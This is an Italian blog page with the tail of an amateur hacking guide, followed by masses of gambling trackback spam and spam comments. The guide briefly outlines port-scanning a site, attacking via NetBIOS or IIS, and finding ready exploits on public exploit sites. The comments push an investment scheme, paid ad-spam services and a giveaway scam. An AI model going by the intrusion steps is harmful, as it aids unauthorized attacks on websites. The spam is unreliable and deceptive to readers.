Possiamo provare con il PUB SCAN oppure la SHELL!
Se manco questo va si usa
Cominciamo a scannerizzare il sito!
Dopo troviamo le vulnerabilità su quei tipi di SERVIZI
(PORTE APERTE OGNI PORTA è UN SERVIZIO 80=HTTP ECC)
Se poi ha la porta 139aperta possiamo provare ad attakkare
tramite NETBIOS!
Poi se ha il servizio IIS utilizziamo i metodi del capitolo 7!
In ogni caso,per ogni cosa utilizziamo sempre Exploit!
Andate su:
www.milw0rm.com
www.securityreason.com
ecc per trovare VULNERABILITà,EXPLOIT e BUG!
Quindi cercate i servizi,nome di un modulo,oppure
se trovate POWERED BY…dovete tener conto di tutto
e cercare exploit che servano per un servizio ecc!
Bhè che dire,questa GRANDE GUIDA è finita!
Spero TANTO che vi sia servita e che sia stato chiaro!
Ciao a tutti!
Ricordate di non fare lamerate o delettare interi siti ma solo
avvisare l’admin della falla
Ciauz a tutti
18:13
Scritto da: vaia95
| Link permanente | Commenti (14)
| Trackback (1) |
Segnala
| OKNOtizie | 
Facebook
Trackback
L'URL per fare trackback su questo post è: http://horror.myblog.it/trackback/1669385
Casino 4952ebb432
Casino 4952ebb432
Trackback da: Casino 4952ebb432 | 26/12/2008
2008no deposit bonus codes
2008no deposit bonus codes
Trackback da: 2008no deposit bonus codes | 06/01/2009
Poker sites for fun not for money
Poker sites for fun not for money
Trackback da: Poker sites for fun not for money | 06/01/2009
Free rtg cash
Free rtg cash
Trackback da: Free rtg cash | 06/01/2009
Free bingo codes no deposit uk
Free bingo codes no deposit uk
Trackback da: Free bingo codes no deposit uk | 06/01/2009
Free bonus slot
Free bonus slot
Trackback da: Free bonus slot | 06/01/2009
Latest no deposit poker cash
Latest no deposit poker cash
Trackback da: Latest no deposit poker cash | 06/01/2009
Mohegan sun video slot rankings
Mohegan sun video slot rankings
Trackback da: Mohegan sun video slot rankings | 06/01/2009
Download free bingo star
Download free bingo star
Trackback da: Download free bingo star | 06/01/2009
Casinos that give free money with no deposits
Casinos that give free money with no deposits
Trackback da: Casinos that give free money with no deposits | 06/01/2009
No deposit gambling
No deposit gambling
Trackback da: No deposit gambling | 06/01/2009
New cool cat no deposit bonus codes forums
New cool cat no deposit bonus codes forums
Trackback da: New cool cat no deposit bonus codes forums | 06/01/2009
Roulette bonus without deposit coupon codes
Roulette bonus without deposit coupon codes
Trackback da: Roulette bonus without deposit coupon codes | 06/01/2009
Free hour play no deposit required
Free hour play no deposit required
Trackback da: Free hour play no deposit required | 06/01/2009
Bingo with 1 deposit to play
Bingo with 1 deposit to play
Trackback da: Bingo with 1 deposit to play | 06/01/2009
Slot bonus codes
Slot bonus codes
Trackback da: Slot bonus codes | 06/01/2009
Rtg deposit bonus
Rtg deposit bonus
Trackback da: Rtg deposit bonus | 07/01/2009
2009 no deposit bonuses
2009 no deposit bonuses
Trackback da: 2009 no deposit bonuses | 07/01/2009
Bingo with 1 deposit to play
Bingo with 1 deposit to play
Trackback da: Bingo with 1 deposit to play | 07/01/2009
Free bingo for cash when u signing up
Free bingo for cash when u signing up
Trackback da: Free bingo for cash when u signing up | 07/01/2009
Free play cazino machine
Free play cazino machine
Trackback da: Free play cazino machine | 07/01/2009
Poker 20 minimum deposit
Poker 20 minimum deposit
Trackback da: Poker 20 minimum deposit | 07/01/2009
Poker instant free money no deposit
Poker instant free money no deposit
Trackback da: Poker instant free money no deposit | 07/01/2009
No deposit free games
No deposit free games
Trackback da: No deposit free games | 07/01/2009
Casino forums
Casino forums
Trackback da: Casino forums | 07/01/2009
Game lines
Game lines
Trackback da: Game lines | 07/01/2009
Casinos new player sign up bonus
Casinos new player sign up bonus
Trackback da: Casinos new player sign up bonus | 07/01/2009
Casinos with nodeposit
Casinos with nodeposit
Trackback da: Casinos with nodeposit | 07/01/2009
No deposit spin bonus
No deposit spin bonus
Trackback da: No deposit spin bonus | 07/01/2009
Microgaming bonus liste
Microgaming bonus liste
Trackback da: Microgaming bonus liste | 07/01/2009
Free slots games
Free slots games
Trackback da: Free slots games | 07/01/2009
January 2009 no deposit poker bonus
January 2009 no deposit poker bonus
Trackback da: January 2009 no deposit poker bonus | 07/01/2009
No deposit slots
No deposit slots
Trackback da: No deposit slots | 07/01/2009
Atlantic city free slots on line
Atlantic city free slots on line
Trackback da: Atlantic city free slots on line | 07/01/2009
No deposit bonus bingo uk
No deposit bonus bingo uk
Trackback da: No deposit bonus bingo uk | 08/01/2009
Slotmachine free
Slotmachine free
Trackback da: Slotmachine free | 08/01/2009
Online bingo free sign up bonus
Online bingo free sign up bonus
Trackback da: Online bingo free sign up bonus | 08/01/2009
Jackpot city promotioncode
Jackpot city promotioncode
Trackback da: Jackpot city promotioncode | 08/01/2009
Poker instant free money no deposit
Poker instant free money no deposit
Trackback da: Poker instant free money no deposit | 08/01/2009
No deposit microgaming free spins
No deposit microgaming free spins
Trackback da: No deposit microgaming free spins | 08/01/2009
Virgin slot games
Virgin slot games
Trackback da: Virgin slot games | 08/01/2009
Casino 49658ea889
Casino 49658ea889
Trackback da: Casino 49658ea889 | 08/01/2009
Welcome bonus no deposit games
Welcome bonus no deposit games
Trackback da: Welcome bonus no deposit games | 08/01/2009
Free poker cash with no deposit required
Free poker cash with no deposit required
Trackback da: Free poker cash with no deposit required | 08/01/2009
Free bingo bonus
Free bingo bonus
Trackback da: Free bingo bonus | 08/01/2009
1 free spin no deposit
1 free spin no deposit
Trackback da: 1 free spin no deposit | 08/01/2009
Microgaming no deposit bonus
Microgaming no deposit bonus
Trackback da: Microgaming no deposit bonus | 08/01/2009
Casino chip codes
Casino chip codes
Trackback da: Casino chip codes | 08/01/2009
Microgaming promotional codes
Microgaming promotional codes
Trackback da: Microgaming promotional codes | 08/01/2009
Super cash game
Super cash game
Trackback da: Super cash game | 08/01/2009
Bonus wap video games
Bonus wap video games
Trackback da: Bonus wap video games | 08/01/2009
Casino new redeem code no deposit bonus
Casino new redeem code no deposit bonus
Trackback da: Casino new redeem code no deposit bonus | 08/01/2009
Poker 20 minimum deposit
Poker 20 minimum deposit
Trackback da: Poker 20 minimum deposit | 08/01/2009
Casino bet royal
Casino bet royal
Trackback da: Casino bet royal | 08/01/2009
Slot-game no-download
Slot-game no-download
Trackback da: Slot-game no-download | 08/01/2009
Gfed + no deposit
Gfed + no deposit
Trackback da: Gfed + no deposit | 08/01/2009
Rtg coupon codes
Rtg coupon codes
Trackback da: Rtg coupon codes | 08/01/2009
Frre slot machines
Frre slot machines
Trackback da: Frre slot machines | 08/01/2009
Brand new rtg coupons
Brand new rtg coupons
Trackback da: Brand new rtg coupons | 08/01/2009
Atlantic lounge no deposit codes
Atlantic lounge no deposit codes
Trackback da: Atlantic lounge no deposit codes | 08/01/2009
No deposit promo codes
No deposit promo codes
Trackback da: No deposit promo codes | 08/01/2009
No deposit sign up bonus poker
No deposit sign up bonus poker
Trackback da: No deposit sign up bonus poker | 08/01/2009
Which bingo no deposit codes
Which bingo no deposit codes
Trackback da: Which bingo no deposit codes | 08/01/2009
Bingo no money needed
Bingo no money needed
Trackback da: Bingo no money needed | 08/01/2009
New no deposit poker
New no deposit poker
Trackback da: New no deposit poker | 08/01/2009
Free jackpot
Free jackpot
Trackback da: Free jackpot | 08/01/2009
Golden nugget vip codes
Golden nugget vip codes
Trackback da: Golden nugget vip codes | 08/01/2009
No deposit free 10$ bonus code
No deposit free 10$ bonus code
Trackback da: No deposit free 10$ bonus code | 08/01/2009
Win real money poker star
Win real money poker star
Trackback da: Win real money poker star | 08/01/2009
No deposit roulette games for money
No deposit roulette games for money
Trackback da: No deposit roulette games for money | 08/01/2009
Royal dice no deposit
Royal dice no deposit
Trackback da: Royal dice no deposit | 08/01/2009
New bingo games to play without computer
New bingo games to play without computer
Trackback da: New bingo games to play without computer | 08/01/2009
Full tilt poker no deposit money
Full tilt poker no deposit money
Trackback da: Full tilt poker no deposit money | 08/01/2009
New free bonus bingo site no deposit
New free bonus bingo site no deposit
Trackback da: New free bonus bingo site no deposit | 08/01/2009
Online game jackpot party
Online game jackpot party
Trackback da: Online game jackpot party | 08/01/2009
Redeem coupon 2009
Redeem coupon 2009
Trackback da: Redeem coupon 2009 | 08/01/2009
Free slots five cards games
Free slots five cards games
Trackback da: Free slots five cards games | 08/01/2009
Free bonus slots no downloads
Free bonus slots no downloads
Trackback da: Free bonus slots no downloads | 08/01/2009
Free poker money no deposit need
Free poker money no deposit need
Trackback da: Free poker money no deposit need | 08/01/2009
Bingo 500% deposit bonus
Bingo 500% deposit bonus
Trackback da: Bingo 500% deposit bonus | 08/01/2009
Poker coupon code
Poker coupon code
Trackback da: Poker coupon code | 08/01/2009
Free signup bonus $5 poker
Free signup bonus $5 poker
Trackback da: Free signup bonus $5 poker | 08/01/2009
Play for fun no download slots
Play for fun no download slots
Trackback da: Play for fun no download slots | 08/01/2009
Best slots at mohegan sun
Best slots at mohegan sun
Trackback da: Best slots at mohegan sun | 09/01/2009
Free slot jackpot party
Free slot jackpot party
Trackback da: Free slot jackpot party | 09/01/2009
Vip lounge no deposit bonus
Vip lounge no deposit bonus
Trackback da: Vip lounge no deposit bonus | 09/01/2009
Poker bonuses no deposit required
Poker bonuses no deposit required
Trackback da: Poker bonuses no deposit required | 09/01/2009
Redeem coupon 7 sultans
Redeem coupon 7 sultans
Trackback da: Redeem coupon 7 sultans | 09/01/2009
1 hour free play
1 hour free play
Trackback da: 1 hour free play | 09/01/2009
No deposit money codes
No deposit money codes
Trackback da: No deposit money codes | 09/01/2009
Free bingo real cash no deposit
Free bingo real cash no deposit
Trackback da: Free bingo real cash no deposit | 09/01/2009
Free bonus sign up 1hour free play
Free bonus sign up 1hour free play
Trackback da: Free bonus sign up 1hour free play | 09/01/2009
Poker free start money no deposit
Poker free start money no deposit
Trackback da: Poker free start money no deposit | 09/01/2009
Playtech no depsoit coupon
Playtech no depsoit coupon
Trackback da: Playtech no depsoit coupon | 09/01/2009
Microgaming best bonus
Microgaming best bonus
Trackback da: Microgaming best bonus | 09/01/2009
No deposit free games
No deposit free games
Trackback da: No deposit free games | 09/01/2009
Juegos gratis wap strict
Juegos gratis wap strict
Trackback da: Juegos gratis wap strict | 09/01/2009
Slot-game no-download
Slot-game no-download
Trackback da: Slot-game no-download | 09/01/2009
Free poker money forum
Free poker money forum
Trackback da: Free poker money forum | 09/01/2009
No deposit sports bonus
No deposit sports bonus
Trackback da: No deposit sports bonus | 09/01/2009
Casino sites that give no deposit sign up bonus
Casino sites that give no deposit sign up bonus
Trackback da: Casino sites that give no deposit sign up bonus | 09/01/2009
Free play cazino machine
Free play cazino machine
Trackback da: Free play cazino machine | 09/01/2009
Free money to poker
Free money to poker
Trackback da: Free money to poker | 09/01/2009
Casino no deposit 10$
Casino no deposit 10$
Trackback da: Casino no deposit 10$ | 09/01/2009
Free poker money no deposit need
Free poker money no deposit need
Trackback da: Free poker money no deposit need | 09/01/2009
Casino $100 free rendom coupon
Casino $100 free rendom coupon
Trackback da: Casino $100 free rendom coupon | 09/01/2009
Play super jackpot party
Play super jackpot party
Trackback da: Play super jackpot party | 09/01/2009
Caisno
Caisno
Trackback da: Caisno | 09/01/2009
Test new poker site
Test new poker site
Trackback da: Test new poker site | 09/01/2009
Casino no purchase
Casino no purchase
Trackback da: Casino no purchase | 09/01/2009
Vegas sportbook
Vegas sportbook
Trackback da: Vegas sportbook | 09/01/2009
Best backgammon bonus
Best backgammon bonus
Trackback da: Best backgammon bonus | 09/01/2009
Free starting pocker money whit out depsoit
Free starting pocker money whit out depsoit
Trackback da: Free starting pocker money whit out depsoit | 10/01/2009
Poker a bonus without the deposit
Poker a bonus without the deposit
Trackback da: Poker a bonus without the deposit | 11/01/2009
Foxwoods slot games
Foxwoods slot games
Trackback da: Foxwoods slot games | 11/01/2009
Free play slots jackpot party
Free play slots jackpot party
Trackback da: Free play slots jackpot party | 11/01/2009
1000 no deposit bonus code
1000 no deposit bonus code
Trackback da: 1000 no deposit bonus code | 11/01/2009
Free bonus sign up 1hour free play
Free bonus sign up 1hour free play
Trackback da: Free bonus sign up 1hour free play | 11/01/2009
Free no deposit bonus bonus code
Free no deposit bonus bonus code
Trackback da: Free no deposit bonus bonus code | 11/01/2009
7sultans 50 free code
7sultans 50 free code
Trackback da: 7sultans 50 free code | 11/01/2009
Flash uk slot machines
Flash uk slot machines
Trackback da: Flash uk slot machines | 11/01/2009
No deposit playtech
No deposit playtech
Trackback da: No deposit playtech | 11/01/2009
Free dawnloading card games
Free dawnloading card games
Trackback da: Free dawnloading card games | 11/01/2009
Welcome bonus no deposit sportbook
Welcome bonus no deposit sportbook
Trackback da: Welcome bonus no deposit sportbook | 11/01/2009
Online wms games
Online wms games
Trackback da: Online wms games | 11/01/2009
Free poker money no deposit
Free poker money no deposit
Trackback da: Free poker money no deposit | 11/01/2009
Poker star no deposit
Poker star no deposit
Trackback da: Poker star no deposit | 11/01/2009
Partypoker sign up code no deposit
Partypoker sign up code no deposit
Trackback da: Partypoker sign up code no deposit | 11/01/2009
Poker free 10 $ 5$ no deposit 4$ 6$
Poker free 10 $ 5$ no deposit 4$ 6$
Trackback da: Poker free 10 $ 5$ no deposit 4$ 6$ | 11/01/2009
Bonus free no deposit
Bonus free no deposit
Trackback da: Bonus free no deposit | 11/01/2009
Casino bonus ohne einzahlung
Casino bonus ohne einzahlung
Trackback da: Casino bonus ohne einzahlung | 11/01/2009
Free to play bonus rounds and side games slots
Free to play bonus rounds and side games slots
Trackback da: Free to play bonus rounds and side games slots | 11/01/2009
No deposit required starting out poker players
No deposit required starting out poker players
Trackback da: No deposit required starting out poker players | 11/01/2009
Rtg no deposit new
Rtg no deposit new
Trackback da: Rtg no deposit new | 11/01/2009
Free slots
Free slots
Trackback da: Free slots | 11/01/2009
Newest no-deposit cash bonuses
Newest no-deposit cash bonuses
Trackback da: Newest no-deposit cash bonuses | 11/01/2009
Casino shark redeem coupon
Casino shark redeem coupon
Trackback da: Casino shark redeem coupon | 11/01/2009
Cool cat bonus codes
Cool cat bonus codes
Trackback da: Cool cat bonus codes | 11/01/2009
Las vegas play money
Las vegas play money
Trackback da: Las vegas play money | 11/01/2009
Free bonuses bingo
Free bonuses bingo
Trackback da: Free bonuses bingo | 11/01/2009
Free money neteller
Free money neteller
Trackback da: Free money neteller | 11/01/2009
Poker sign in bonus without deposit
Poker sign in bonus without deposit
Trackback da: Poker sign in bonus without deposit | 11/01/2009
Free slot games wtih no downloads
Free slot games wtih no downloads
Trackback da: Free slot games wtih no downloads | 11/01/2009
Video slots with bonus round
Video slots with bonus round
Trackback da: Video slots with bonus round | 11/01/2009
No deposit no downloads real cash bingo
No deposit no downloads real cash bingo
Trackback da: No deposit no downloads real cash bingo | 11/01/2009
Super jackpot party slot machines
Super jackpot party slot machines
Trackback da: Super jackpot party slot machines | 11/01/2009
Game lines
Game lines
Trackback da: Game lines | 12/01/2009
Vip lounge no deposit codes
Vip lounge no deposit codes
Trackback da: Vip lounge no deposit codes | 12/01/2009
Downloadable games no money
Downloadable games no money
Trackback da: Downloadable games no money | 12/01/2009
List of no deposit codes
List of no deposit codes
Trackback da: List of no deposit codes | 12/01/2009
Free vegas coupons
Free vegas coupons
Trackback da: Free vegas coupons | 12/01/2009
No deposit rtg bonus codes
No deposit rtg bonus codes
Trackback da: No deposit rtg bonus codes | 12/01/2009
Coolcat bonuscode 2009
Coolcat bonuscode 2009
Trackback da: Coolcat bonuscode 2009 | 12/01/2009
Casinos that give free money with no deposits
Casinos that give free money with no deposits
Trackback da: Casinos that give free money with no deposits | 12/01/2009
Casino crush forum
Casino crush forum
Trackback da: Casino crush forum | 12/01/2009
Casino pokie machine
Casino pokie machine
Trackback da: Casino pokie machine | 12/01/2009
No deposit poker money
No deposit poker money
Trackback da: No deposit poker money | 12/01/2009
Rtg bonus codes
Rtg bonus codes
Trackback da: Rtg bonus codes | 12/01/2009
1 hour of slot
1 hour of slot
Trackback da: 1 hour of slot | 12/01/2009
Casino las vegas gratis
Casino las vegas gratis
Trackback da: Casino las vegas gratis | 12/01/2009
Full tilt poker no deposit bonus
Full tilt poker no deposit bonus
Trackback da: Full tilt poker no deposit bonus | 12/01/2009
Free starting pocker money whit out depsoit
Free starting pocker money whit out depsoit
Trackback da: Free starting pocker money whit out depsoit | 12/01/2009
Free slot 2007-2009
Free slot 2007-2009
Trackback da: Free slot 2007-2009 | 12/01/2009
2009 rtg no deposit bonus coupon codes
2009 rtg no deposit bonus coupon codes
Trackback da: 2009 rtg no deposit bonus coupon codes | 12/01/2009
Las vegas play money
Las vegas play money
Trackback da: Las vegas play money | 12/01/2009
Usa lounge game froum
Usa lounge game froum
Trackback da: Usa lounge game froum | 12/01/2009
Super jackpot party computer game
Super jackpot party computer game
Trackback da: Super jackpot party computer game | 12/01/2009
Video poker minimum deposit
Video poker minimum deposit
Trackback da: Video poker minimum deposit | 12/01/2009
Free online bingo games (without signing up)
Free online bingo games (without signing up)
Trackback da: Free online bingo games (without signing up) | 12/01/2009
Newest no deposit bonus
Newest no deposit bonus
Trackback da: Newest no deposit bonus | 12/01/2009
Super jackpot party slot machine
Super jackpot party slot machine
Trackback da: Super jackpot party slot machine | 13/01/2009
Poker free 10 dollar
Poker free 10 dollar
Trackback da: Poker free 10 dollar | 13/01/2009
Casino rtg
Casino rtg
Trackback da: Casino rtg | 13/01/2009
Free slot bonus party
Free slot bonus party
Trackback da: Free slot bonus party | 13/01/2009
Vip lounge real time gaming
Vip lounge real time gaming
Trackback da: Vip lounge real time gaming | 13/01/2009
Bonus ohne einzahlung coupon
Bonus ohne einzahlung coupon
Trackback da: Bonus ohne einzahlung coupon | 13/01/2009
Virtual code coupon
Virtual code coupon
Trackback da: Virtual code coupon | 13/01/2009
Online free slots no sign in or download
Online free slots no sign in or download
Trackback da: Online free slots no sign in or download | 13/01/2009
Free sign up bonus roulette
Free sign up bonus roulette
Trackback da: Free sign up bonus roulette | 13/01/2009
All bonus code no deposit
All bonus code no deposit
Trackback da: All bonus code no deposit | 13/01/2009
Vip lounge no deposit coupon
Vip lounge no deposit coupon
Trackback da: Vip lounge no deposit coupon | 13/01/2009
Forum playtech
Forum playtech
Trackback da: Forum playtech | 13/01/2009
Machin game
Machin game
Trackback da: Machin game | 13/01/2009
Sign up bonus to games websites
Sign up bonus to games websites
Trackback da: Sign up bonus to games websites | 13/01/2009
Casino free without deposit
Casino free without deposit
Trackback da: Casino free without deposit | 13/01/2009
Casino no deposit required
Casino no deposit required
Trackback da: Casino no deposit required | 13/01/2009
Online slots bonus no deposit cashable
Online slots bonus no deposit cashable
Trackback da: Online slots bonus no deposit cashable | 13/01/2009
Free vegas coupons
Free vegas coupons
Trackback da: Free vegas coupons | 13/01/2009
How to play craps free download
How to play craps free download
Trackback da: How to play craps free download | 14/01/2009
2009 updated no deposit bingo
2009 updated no deposit bingo
Trackback da: 2009 updated no deposit bingo | 15/01/2009
Casino sites that give no deposit sign up bonus
Casino sites that give no deposit sign up bonus
Trackback da: Casino sites that give no deposit sign up bonus | 15/01/2009
Free sign up bingo promotion codes
Free sign up bingo promotion codes
Trackback da: Free sign up bingo promotion codes | 16/01/2009
Casino free without deposit
Casino free without deposit
Trackback da: Casino free without deposit | 16/01/2009
No deposit gambling
No deposit gambling
Trackback da: No deposit gambling | 16/01/2009
Super jackpot party slot machine
Super jackpot party slot machine
Trackback da: Super jackpot party slot machine | 16/01/2009
No deposit bonus new offer
No deposit bonus new offer
Trackback da: No deposit bonus new offer | 16/01/2009
Online poker no deposit
Online poker no deposit
Trackback da: Online poker no deposit | 17/01/2009
Poker no deposit bouns
Poker no deposit bouns
Trackback da: Poker no deposit bouns | 17/01/2009
No deposit no download
No deposit no download
Trackback da: No deposit no download | 17/01/2009
New no deposit poker sites
New no deposit poker sites
Trackback da: New no deposit poker sites | 17/01/2009
New no deposit free chips
New no deposit free chips
Trackback da: New no deposit free chips | 18/01/2009
No deposit codes
No deposit codes
Trackback da: No deposit codes | 18/01/2009
No deposit codes lucky nugget
No deposit codes lucky nugget
Trackback da: No deposit codes lucky nugget | 19/01/2009
Commenti
c' è un commento che non sia una puttanata postata da un cazzo di spamm bot ?
Scritto da: -remembertodie. | 25/06/2009
Good day esteemed audience!
As I see , we got here discussions on
different ways of making money . I'm a wealthy person, and
I'm in one theme for a long time -
it is a high yield investment program. Comparing with others, manage it successfully.
I know this discussion is ambiguous , and it may heave a flame.
If I fumbled , please, admins of this forum, transfer my post to the appropriate page.
But the anyone who are interested steady high earnings please welcome visit my web site www.theinvestblog.com .
Scritto da: galEffolo | 14/08/2009
Да, тут до меня побывало прличное количество читателей. )
Scritto da: Spenceacers | 05/04/2010
[url=http://koszt.info/bankowos%C4%87+hipoteczna+w+polsce.html]Kredyt.net - kredyty gotowkowe, pozyczki gotowkowe, pozyczki ...[/url]
Mozliwosc zlozenia wniosku o kredyt przez Internet. ... db kredyt gotowkowy. nieziemsko niskie oprocentowanie. wysoka kwota kredytu. minimum formalnosci - bez ...
Scritto da: ninafajda | 19/05/2010
Размещю Вашу рекламу на 21 тысяче досок.
ссылок в Яндексе появляется порядка 10000 (можно больше) - 50$
На форумы 30$ на 60 тыс.
Отчеты предоставляю.
Заказы или вопросы пишите на renfer@bk.ru
Scritto da: gerldfh | 21/07/2010
Размещю Вашу рекламу на 21 тысяче досок.
ссылок в Яндексе появляется порядка 10000 (можно больше) - 50$
На форумы 30$ на 60 тыс.
Отчеты предоставляю.
Заказы или вопросы пишите на renfer@bk.ru
Scritto da: gerldfh | 21/07/2010
Подам Вашу рекламу во многие сайты интернета заказы отправляйте на web8@km.ru :
1.Подать рекламное сообщение в 3050 доски бесплатных объявлений интернета
(эторучная подача не програмой) 99$. Меняется текст и подбираются
высокочастотные ключевые по Вашей теме.
2.Подать рекламное сообщение в 21500 доски бесплатных объявлений интернета
(авторассылка лицензионной програмой)99$. Тоже меняется текст и подбираются
высокочастотные ключевые.Много ссылок получается а Яндексе или Гугле около 11тысяч.
3.В интернет-форумы 60$ на 175000 много ссылок в Гугле получается можно текст менять.
4.Податьвручную рекламное сообщение в 21500 доски бесплатных объявлений
интернета 499$
5.Пункты 1+2+3 199$
Scritto da: bewameris | 11/09/2010
Подам Вашу рекламу во многие сайты интернета заказы отправляйте на web8@km.ru :
1.Подать рекламное сообщение в 3050 доски бесплатных объявлений интернета
(эторучная подача не програмой) 99$. Меняется текст и подбираются
высокочастотные ключевые по Вашей теме.
2.Подать рекламное сообщение в 21500 доски бесплатных объявлений интернета
(авторассылка лицензионной програмой)99$. Тоже меняется текст и подбираются
высокочастотные ключевые.Много ссылок получается а Яндексе или Гугле около 11тысяч.
3.В интернет-форумы 60$ на 175000 много ссылок в Гугле получается можно текст менять.
4.Податьвручную рекламное сообщение в 21500 доски бесплатных объявлений
интернета 499$
5.Пункты 1+2+3 199$
Scritto da: bewameris | 11/09/2010
Пошлю Вашу рекл.информацию на много сайтов,
во всех вариантах после выполнения работ получитеотчет,а написаное
количество сайтов это там где действительно разместилось.
E-mail для контактов inter7@bossmail.ru
1)Послать в 20900 доскиинтернета лицензионым софтом последней версии (есть
расшифровка капчи) 98$ .В процесе выполнения работы изменяется текст
сообщения и будут использованы ВЧ слова для рекл.объявлений.
2)Послать в 3040 доскиинтернета (ручнойрежим) 98$. В этом варианте тоже
меняется текст и используются ВЧ слова. После апа выдачи в каталоге Яндекс
или Гугл приблезительно 9-14000 и больше бывает сылокна Ваш сайт.
3)В 170000 разныхфорумов 65$ обычно в гугле сылок получается много.
4)Послать в 20900 доскиинтернета (ручнойрежим) 498 $. Изменение рекл.текста и Вч слова есть.
5)Послать в любые сайты на Ваш выбор 98$ за одну тысячу (собрать включено в цену)
При заказе нескольких варианов скидки.
Scritto da: neztaber | 13/09/2010
Дам Вашу рекламу на многих сайтах интернета rev2287@gmail.com
1) В 3тысячи интернет-досок 99dollars ручной регистрацией. Подбираю
высокочастотные слова и меняю текст при рассылке чтобы охватить большее
количество запросов. После выполнения работы предоставлю отчеты -
ссылки где дал рекламу и варианты объявлений.
2) В 21тысячу интер.досок 99dollars автоматической рассылкой. Тоже
подбирабтся высокочастотные ключевые слова по Вашей теме и меняется
текст при регистрации.Отчеты предоставляю. + В каталогах Янд. или Гугл появится
примерно 12тысяч ссылок
3) Регистрация вручную в любых сайтах на Ваш выбор 99dollars за 2000
сбор этих сайтов в стоимость входит (я собираю). Тоже подбираю вч слова
и меняю текст.Отчеты в виде ссылок этих сайтов и вч запросов.
4) Сборка баз потенциальных клиентов (адреса, e-mail, телефоны и другую
информацию) 99dollars за 1000.
5) На 160тысяч интернет-форумов 99dollars . В этом варианте тоже
побираю вч слова и меняю текст.
6) Делаю сайты от мини сайта до портала. Примерная цена бизнес-сайта
250дол. "под ключ" + стартовая раскрутка бесплатно.
rev2287@gmail.com
Scritto da: heopam | 16/10/2010
Дам Вашу рекламу на многих сайтах интернета rev2287@gmail.com
1) В 3тысячи интернет-досок 99dollars ручной регистрацией. Подбираю
высокочастотные слова и меняю текст при рассылке чтобы охватить большее
количество запросов. После выполнения работы предоставлю отчеты -
ссылки где дал рекламу и варианты объявлений.
2) В 21тысячу интер.досок 99dollars автоматической рассылкой. Тоже
подбирабтся высокочастотные ключевые слова по Вашей теме и меняется
текст при регистрации.Отчеты предоставляю. + В каталогах Янд. или Гугл появится
примерно 12тысяч ссылок
3) Регистрация вручную в любых сайтах на Ваш выбор 99dollars за 2000
сбор этих сайтов в стоимость входит (я собираю). Тоже подбираю вч слова
и меняю текст.Отчеты в виде ссылок этих сайтов и вч запросов.
4) Сборка баз потенциальных клиентов (адреса, e-mail, телефоны и другую
информацию) 99dollars за 1000.
5) На 160тысяч интернет-форумов 99dollars . В этом варианте тоже
побираю вч слова и меняю текст.
6) Делаю сайты от мини сайта до портала. Примерная цена бизнес-сайта
250дол. "под ключ" + стартовая раскрутка бесплатно.
rev2287@gmail.com
Scritto da: heopam | 16/10/2010
Предложение раскрутки сайтов или просто разослать объявление
1. На 3050 бесплатных досок101$ .Размещение происходит ручнойрассылкой.
Подбираются Вчслова по Вашей теме и во время расылки меняется текст. После
выполнения работы получитеотчет.
2. На девятнадцать тысяч досокобъявл. авторазмещением 101$ (вч слова, меняется текст) в ПС более десяти тыс.сылок
3. На любыесайты 101$ на 2100 (вчслова, меняется текст, собрать базу входит в цену эторучная )
4. Собор баз сайтов, потенц.клиентов (урлы, почта и др.) 101$ за 1000
5. На 170000 форумов 101$ (вч слова, меняется текст, отчет)
6. Изготовление сайтов.
E-mail bavt65@mail.ru
Scritto da: balarow | 18/10/2010
Виктор Сергеевич наебидонил IPAD и 600 $ впридачу
Джек наебидонил IPHON 4 и 360 $ впридачу
Нелли наебидонила ноутбук MAC и 450$ впридачу ...
Рустам наебидонил Canon REBEL и 1000$ впридачу …
и это только за неделю???!!!
ВАУ!!!
www.maxim-axenov.polubomu.ru -
А сколько сможешь наебидонить ТЫ? Интересно?
Scritto da: ebidomania | 19/10/2010
Виктор Сергеевич наебидонил IPAD и 600 $ впридачу
Джек наебидонил IPHON 4 и 360 $ впридачу
Нелли наебидонила ноутбук MAC и 450$ впридачу ...
Рустам наебидонил Canon REBEL и 1000$ впридачу …
и это только за неделю???!!!
ВАУ!!!
www.maxim-axenov.polubomu.ru -
А сколько сможешь наебидонить ТЫ? Интересно?
Scritto da: ebidomania | 20/10/2010
Scrivi un commento